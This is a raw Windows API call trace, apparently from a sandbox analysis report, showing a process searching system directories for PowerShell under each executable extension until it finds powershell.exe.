	[0327.225] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.225] SetErrorMode (uMode=0x1) returned 0x1
	[0327.226] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.226] SetErrorMode (uMode=0x1) returned 0x1
	[0327.226] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.226] SetErrorMode (uMode=0x1) returned 0x1
	[0327.226] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.226] SetErrorMode (uMode=0x1) returned 0x1
	[0327.226] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.227] SetErrorMode (uMode=0x1) returned 0x1
	[0327.227] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.227] SetErrorMode (uMode=0x1) returned 0x1
	[0327.227] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.227] SetErrorMode (uMode=0x1) returned 0x1
	[0327.227] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.228] SetErrorMode (uMode=0x1) returned 0x1
	[0327.228] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.228] SetErrorMode (uMode=0x1) returned 0x1
	[0327.228] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.228] SetErrorMode (uMode=0x1) returned 0x1
	[0327.228] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.229] SetErrorMode (uMode=0x1) returned 0x1
	[0327.229] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.229] SetErrorMode (uMode=0x1) returned 0x1
	[0327.230] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.230] SetErrorMode (uMode=0x1) returned 0x1
	[0327.230] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.230] SetErrorMode (uMode=0x1) returned 0x1
	[0327.230] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.230] SetErrorMode (uMode=0x1) returned 0x1
	[0327.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.231] SetErrorMode (uMode=0x1) returned 0x1
	[0327.231] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.231] SetErrorMode (uMode=0x1) returned 0x1
	[0327.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.232] SetErrorMode (uMode=0x1) returned 0x1
	[0327.232] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.232] SetErrorMode (uMode=0x1) returned 0x1
	[0327.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.232] SetErrorMode (uMode=0x1) returned 0x1
	[0327.232] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.233] SetErrorMode (uMode=0x1) returned 0x1
	[0327.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.233] SetErrorMode (uMode=0x1) returned 0x1
	[0327.233] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.233] SetErrorMode (uMode=0x1) returned 0x1
	[0327.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.234] SetErrorMode (uMode=0x1) returned 0x1
	[0327.234] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.234] SetErrorMode (uMode=0x1) returned 0x1
	[0327.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.234] SetErrorMode (uMode=0x1) returned 0x1
	[0327.234] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.235] SetErrorMode (uMode=0x1) returned 0x1
	[0327.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.235] SetErrorMode (uMode=0x1) returned 0x1
	[0327.235] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.235] SetErrorMode (uMode=0x1) returned 0x1
	[0327.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.235] SetErrorMode (uMode=0x1) returned 0x1
	[0327.236] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.236] SetErrorMode (uMode=0x1) returned 0x1
	[0327.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.236] SetErrorMode (uMode=0x1) returned 0x1
	[0327.236] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.236] SetErrorMode (uMode=0x1) returned 0x1
	[0327.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.237] SetErrorMode (uMode=0x1) returned 0x1
	[0327.237] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.237] SetErrorMode (uMode=0x1) returned 0x1
	[0327.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.237] SetErrorMode (uMode=0x1) returned 0x1
	[0327.238] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.238] SetErrorMode (uMode=0x1) returned 0x1
	[0327.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.238] SetErrorMode (uMode=0x1) returned 0x1
	[0327.238] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.238] SetErrorMode (uMode=0x1) returned 0x1
	[0327.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.239] SetErrorMode (uMode=0x1) returned 0x1
	[0327.239] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.239] SetErrorMode (uMode=0x1) returned 0x1
	[0327.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.239] SetErrorMode (uMode=0x1) returned 0x1
	[0327.239] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.240] SetErrorMode (uMode=0x1) returned 0x1
	[0327.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.240] SetErrorMode (uMode=0x1) returned 0x1
	[0327.240] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.240] SetErrorMode (uMode=0x1) returned 0x1
	[0327.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.241] SetErrorMode (uMode=0x1) returned 0x1
	[0327.241] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.241] SetErrorMode (uMode=0x1) returned 0x1
	[0327.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.241] SetErrorMode (uMode=0x1) returned 0x1
	[0327.241] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.241] SetErrorMode (uMode=0x1) returned 0x1
	[0327.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.242] SetErrorMode (uMode=0x1) returned 0x1
	[0327.242] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.242] SetErrorMode (uMode=0x1) returned 0x1
	[0327.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.242] SetErrorMode (uMode=0x1) returned 0x1
	[0327.242] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.243] SetErrorMode (uMode=0x1) returned 0x1
	[0327.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.243] SetErrorMode (uMode=0x1) returned 0x1
	[0327.243] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.243] SetErrorMode (uMode=0x1) returned 0x1
	[0327.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.244] SetErrorMode (uMode=0x1) returned 0x1
	[0327.244] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.244] SetErrorMode (uMode=0x1) returned 0x1
	[0327.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.786] SetErrorMode (uMode=0x1) returned 0x1
	[0327.786] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3ccdb0
